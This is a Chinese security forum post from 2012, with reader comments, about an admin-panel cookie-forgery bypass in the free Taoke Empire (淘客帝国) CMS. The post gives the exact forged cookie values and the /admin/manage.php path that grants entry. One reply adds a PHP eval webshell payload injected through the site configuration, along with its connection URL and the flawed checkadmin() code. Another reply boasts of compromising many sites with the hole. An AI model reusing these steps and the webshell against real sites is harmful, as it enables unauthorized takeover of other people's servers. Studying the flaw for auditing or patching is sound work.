淘客帝国最新免费版后台cookie欺骗

2012-11-26 22:57:35 24 959
主题:淘客帝国最新免费版后台cookie欺骗
作者:孤心
偶然发现的淘客帝国免费版的后台可以cookie欺骗

     工具:   老兵的cookie'欺骗工具  
    关键字: 分类- 商城- 品牌- 女人- 男人- 美容- 鞋包- 数码- 居家- 食品

     首先打开工具把cookie改为 COOKIEadminuser=admin; DedeUserID=1; PHPSESSID=11111 ,然后再工具的地址栏那里输入网站的后台(默认后台/admin)等页面全部出来后再在后台目录后加上manage.php 跳转就可以进入后台了,进入后台后怎么样拿shell就简单了,这里就不说了..

漏洞已跟官网客服报了



关于作者

评论24次

要评论?请先  登录  或  注册
  • 24楼
    2012-12-8 16:38

    好像挺低级的一个漏洞

  • 23楼
    2012-12-7 14:30

    session不作验证....

  • 22楼
    2012-12-4 17:53

    这个怎么玩的?代码神马意思?

  • 21楼
    2012-12-4 00:59

    楼上说的的确啊

  • 20楼
    2012-12-1 17:04

    有奇葩程序员才有做安全的人存在。

  • 19楼
    2012-11-29 20:13

    学习了 试试去

  • 18楼
    2012-11-29 18:19

    学习拉,膜拜高手

  • 17楼
    2012-11-29 10:31

    少年给你个玩具玩 你就懂了

    ------------------------------test2if.php<?phpif( ($_GET['A']!="") && ($_GET['B']!="") ){    echo("Su");              }else{      echo("Fe");      exit;  }    echo("_login_main");?>--------------------------------------------------test1if.php<?phpif( ($_GET['A']!="") || ($_GET['B']!="") ){    echo("Su");  }else{      echo("Fe");      exit;  }            echo("_login_main");    ?>

  • 16楼
    2012-11-28 19:33

    我也是这么认为的

  • 15楼
    2012-11-28 17:43

    路过,打酱油,可以么。

  • 14楼
    2012-11-28 12:44

    还是用session吧!!

  • 13楼
    2012-11-27 21:38

    之前X 淘客站的时候用这洞日过一批。。。

  • 12楼
    2012-11-27 20:36

    不知道是我的问题还是啥... 测试了好几个都没成功

  • 11楼
    2012-11-27 16:45

    试试去。

  • 10楼
    2012-11-27 14:17

    又是一个条件问题

  • 9楼
    2012-11-27 11:51
  • 8楼
    2012-11-27 11:11

    学雷锋 一定没好下场无节操的人太多了妹子还会给你送 好人卡你卖萌 人家就黑你

  • 7楼
    2012-11-27 11:10

    这个程序员 真是奇葩啊

  • 6楼
    2012-11-27 10:52

    getshell 简单 系统配置 {${@eval($_POST['anlfi'])}} 一句话连接地址/data/configdata.php顺便补一下代码===================|The End}

    ##admin目录下php 部验证##--------------------main.php<?phprequire_once '../include/adminfunction.php';checkadmin();---------------------/include/sysfunction.php#####function checkadmin(){    global $COOKIEadminuser;    global $sitetitleurl;    //判断    if( (isset($_COOKIE['COOKIEadminuser']) && $_COOKIE['COOKIEadminuser']!="") || (isset($_SESSION['adminuser']) && $_SESSION['adminuser']!="") ){    }else{        echo("<script language='JavaScript'>top.location.href='".$sitetitleurl."';</script>");        exit;    }}#####----------------------
    ============^start=======code一看就懂$_COOKIE['COOKIEadminuser']!=""只要不为空就ok //index.php 一看到这里就知道 程序员自己催眠了自己 登出就把adminuser 清空 .........COOKIEadminuser是干神马的?/admin/index.php 是不会通过验证 但是如果访问/admin/manage.php 的话一样ok 也就lz所谓的偶然发现了 COOKIEadminuser 并没有空if($action=="loginout"){ $_SESSION['adminuser'] = ""; SetCookie("adminuser", ""); redirect_to($sitetitleurl);}其实所有审计过程 是倒序 解说是正序乌云才不会理你呢 早上好O(∩_∩)O哈!

  • 5楼
    2012-11-27 09:53

    确实好用